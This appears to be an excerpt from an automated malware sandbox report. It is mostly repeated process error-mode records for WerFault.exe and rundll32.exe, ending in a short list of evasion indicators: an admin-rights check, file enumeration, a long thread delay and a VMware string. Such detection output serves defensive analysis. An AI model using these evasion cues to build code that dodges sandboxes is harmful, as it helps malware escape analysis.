Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_12-12456
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 9.0 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.5 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4E5A4 FindFirstFileW,FindClose,4_2_04A4E5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,4_2_04A4DFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043CE5A4 FindFirstFileW,FindClose,12_2_043CE5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_043CDFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,12_2_043CDFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_03FFE5A4 FindFirstFileW,FindClose,13_2_03FFE5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_03FFDFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,13_2_03FFDFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0494E5A4 FindFirstFileW,FindClose,14_2_0494E5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0494DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,14_2_0494DFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04D4E5A4 FindFirstFileW,FindClose,15_2_04D4E5A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04D4DFD8 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,15_2_04D4DFD8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A502F4 GetSystemInfo,4_2_04A502F4
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: Amcache.hve.8.drBinary or memory string: VMware
